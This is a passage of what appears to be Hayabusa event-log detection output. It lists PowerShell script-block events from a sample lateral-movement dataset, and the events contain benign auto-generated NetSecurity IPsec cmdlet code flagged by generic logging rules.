$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 
'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
